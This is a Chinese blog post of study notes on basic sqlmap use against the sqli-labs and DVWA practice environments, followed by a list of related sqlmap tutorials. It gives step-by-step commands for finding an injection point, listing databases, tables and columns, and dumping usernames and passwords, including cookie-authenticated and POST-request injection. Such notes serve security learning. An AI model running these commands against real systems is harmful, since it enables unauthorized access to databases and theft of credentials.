sqlmap基本用法

最新推荐文章于 2024-09-10 10:00:13 发布
最新推荐文章于 2024-09-10 10:00:13 发布
阅读量561 收藏 7
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Oavinci/article/details/92844123
版权

最近处于查缺补漏阶段,再重温一遍sqlmap…

写的都是sqlmap最最最基本用法记录(虽然现在能用sqlmap做的题不多了…

 

我这里对sqli-labs-master第一关进行测试(文字是Windows跑sqlmap命令,图片演示使用的是kali自带的sqlmap)

 

1、检测注入点

使用-u参数进行设置注入点URL,如果要指定注入的参数,可以使用-p,这里只有一个注入点也可不加。

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -p id

可以看到存在GET的布尔盲注

Windows系统 Apache2.4.23 PHP5.2.17

 

2、获取数据库

使用--dbs获取数据库列表

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -p id --dbs

 

3、获取所有的表

使用-T指定要获取字段的表名,使用--columns来获取字段列表。

获取dvwa数据库的表,使用-D指定数据库,使用--tables参数来获取表列表。

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -p id -D dvwa --tables

4、获取字段

使用-T指定要获取字段的表名,使用--columns来获取字段列表。

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-1/?id=1 -p id -D dvwa -T users --columns

5、获取字段内容

使用-C指定要获取内容的字段列表,多个字段使用逗号分隔,使用--dump来获取内容。

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?Submit=Submit&id=2" -p id -D dvwa -T users -C user,password --dump

6、数据保存

SQLMap自动将数据保存了下来,通过提示信息我们可以看出来是保存到了

7、设置cookie

这里用的是dvwa的实验环境

使用--cookie指定使用的cookie信息,这个cookie可以burpsuite抓包获取。

(注意这里url和cookie都需要加引号)

python sqlmap.py -u "http://192.169.5.66:8081/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit#" -p id --cookie "security=low; PHPSESSID=61hgkv8hncgclpmu0fbngcakg6" --dbs

8、POST注入

此处以sqli-labs-master第十一关演示,点击Submit提交数据,bp截取登陆数据包

将数据包内容复制下来保存成txt文件

python sqlmap.py -r 11.txt

 

 

FTOrange
关注
专栏目录
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
sqlmap基本用法和联合注入
weixin_44098523的博客
02-02 1961
sqlmap基本用法 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的...
Sqlmap使用教程
B-Tree
02-24 3832
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
shanguicsdn111的博客
09-10 3019
提示:SQLmap不能直接「扫描」网站漏洞,先用其他扫描工具扫出注入点,再用SQLmap验证并「利用」注入点。检测「post请求」的注入点,使用BP等工具「抓包」,将http请求内容保存到txt文件中。参数,指定需要检测的url,单/双引号包裹。风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名。就是 all 的意思,获取所有能获取的内容,会消耗很长时间。指定目标「数据库」,单/双引号包裹,常配合其他参数使用
Sqlmap使用方法
w1304099880的博客
10-26 1271
sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下: 检查注入点: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11--...
sqlmap的简要使用方法
weixin_34004750的博客
07-08 215
仅作为备忘!!! sqlmap使用: 注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。 sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' #-u 注入点   检测注入点是否可用s...
SQLMap基本使用方法及简单介绍
weixin_45287663的博客
01-14 3965
SQLMap介绍 SQLMap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定URL的SQL注入漏洞,SQLMap支持的数据库有MySQL、Oracle、Microsoft Access、PostgreSQL、Microsoft SQL Server、IBM DB2、SQLite、Sybase和Firebird等。SQLMap主要使用了以下五种SQL注入技术。 联合查询注入:在可以...
sqlmap基本使用方法
08-24
- *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
sqlmap基本使用方法
08-23
下面是SQLMap基本使用方法: 1. 下载和安装:你可以从SQLMap的官方网站(https://sqlmap.org/)下载最新的版本。解压缩后,你可以直接运行sqlmap.py文件。 2. 目标URL:使用以下命令指定要测试的目标URL: ``` ...
SQLmap压缩包,SQLmap压缩包
06-07
使用SQLmap时,你需要了解基本的命令行选项,例如指定目标URL、选择测试方法、设置代理等。同时,了解如何正确和合法地使用这个工具至关重要,避免对未经授权的系统进行测试,以免触犯法律。 总的来说,SQLmap是一...
sqlmap的基础使用
weixin_43786406的博客
02-19 3156
一、以less-3/为入口,利用sqlmap实施自动化注入,获取sqli-labs网站的登录账户和密码 1、访问http://192.168.207.1/sql/Less-3,启动sqlmap 2、寻找注入点http://192.168.207.1/sql/Less-3/?id=1 3、 获取数据库的所有库名-u "http://192.168.207.1/sql/Less-3/?id=1" 4、获取网站当前所在数据库的库名-u "http://192.168.207.1/sql/Les..
sqlmap基本使用
Yy10205473的博客
12-25 290
sqlmap基本使用GET型基础参数获取数据库信息POST型基础参数使用技巧 GET型 基础参数 GET类型的sql注入,需要用到的sqlmap参数为 -u 基本格式: sqlmap + -u + url + 其他参数 每一个参数都需要用空格分开 简单GET型常用参数 参数 介绍 -o 开启所有优化开关 -batch 出现的选项全部默认选是 -dbms 表示该网站使用了什么类型的数据库,后需要接数据库类型。例:-dbms mysql -level 执行测试的等级(1-5,
sqlmap详细使用教程
热门推荐
星落的博客
05-11 12万+
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 sqlmap常用命令 sqlmap主页面 实例演示 到此就完成了sqlmap的介绍,如果想了解更多的Kali工具请关注我! ...
sqlmap 基本使用方法(初级版)
weixin_41472455的博客
03-31 212
sqlmap是一个很好的sql注入工具,操作简单,容易上手 sqlmap -u url //查看目标url是否存在sql注入漏洞 sqlmap -u url --dbs //如果存在,爆破数据库 sqlmap -u url -D 数据库名 --tables ...
sqlmap基本使用
a69843251的博客
03-27 397
Sqlmap使用 1、扫描地址:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” 2、忽略选项:Sqlmap -u “http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=2” --batch 3、提升扫描等级:Sqlmap -u “http://12...
SQLmap基本使用
土拨鼠挖洞中的博客
06-23 193
一、基本使用 判断是否存在注入点-u"url" --batch                                                     获取全部数据库 -u  "url"  --dbs --batch                                                获取当前数据库 -u "url" --current-db --batc...
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 2776
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值